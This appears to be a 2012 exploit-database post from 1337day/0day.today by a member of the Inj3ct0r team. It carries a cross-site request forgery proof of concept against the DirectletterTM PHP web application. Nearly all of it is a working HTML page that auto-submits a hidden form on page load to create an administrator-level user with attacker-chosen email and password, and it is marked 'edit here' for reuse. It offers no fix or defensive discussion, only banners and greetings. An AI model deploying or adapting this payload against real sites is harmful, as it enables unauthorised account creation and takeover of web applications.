DirectletterTM CSRF Add User

2012-04-07T00:00:00
ID 1337DAY-ID-17999
Type zdt
Reporter DoSs-Dz
Modified 2012-04-07T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0  [»] Site            : 1337day.com                                     0
1  [»] Support e-mail  : submit[@]1337day.com                            1
0                                                                        0
1               +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+                1
0               |I'm DoSs-Dz Member From Inj3ct0r Team  |                1
1               +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+                0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
+----------------------------------------------------------------------------+
#» Exploit Title : DirectletterTM CSRF Add User
#» Date :  06 April 2012
#» Vendor Site  : www.directletter.com
#» Version : n/a
#» Tested On : windows 7 professional
#» Big Thank to : Inj3ct0r Team & Inj3ct0r Operators "CrosS"
+----------------------------------------------------------------------------+



[!1»] CSRF add admin Exploit P0C =» 
  <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title> directletterTM CSRF Add User </title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "3453","0" );
function pausecomp(millis){
    var date = new Date();
    var curDate = null;
do { curDate = new Date(); }
while(curDate-date < millis)
;}function fireForms(){
    var count = 2;
    var i=0;
for(i=0; i<count; i++)
{document.forms[i].submit(); 
pausecomp(pauses[i]);}}
</script>
<H2> directletterTM CSRF Add User </H2>
<form method="POST" name="form0" action="http://www.salelogic.com:80/directletter/demo/useredit.php">
<input type="hidden" name="email" value="[email protected]"/>   <---- edit here  your email 
<input type="hidden" name="name" value="DoSs"/>   <---- edit here
<input type="hidden" name="status" value="3"/>
<input type="hidden" name="memo" value=""/>
<input type="hidden" name="code" value="123123"/>  <---- edit here your pass
<input type="hidden" name="FormAction" value="insert"/>
<input type="hidden" name="FormName" value="directletter_users"/>
<input type="hidden" name="PK_email" value=""/>
</form>
</body>
</html>
 



+--------------------------------------------------------------------------------------------------------+
|[»] Greetz to =» [ Jonturk47 ][ Robert Miles ]  , [ Abdou Abdo ] , [ Hacker_Dz] , [ Damane2011 ]        |
|[»] Greetz to =» [ 1337day.com ] , [ sec4ever.com ] , [ Dz4all.com ] , [ v4-team.com ] , [ Vbspiders ]  |
+--------------------------------------------------------------------------------------------------------+
+------------------------------------+ 
|./ Gheurrara on : 06 april 2012     |
+------------------------------------+ 



#  0day.today [2018-01-04]  #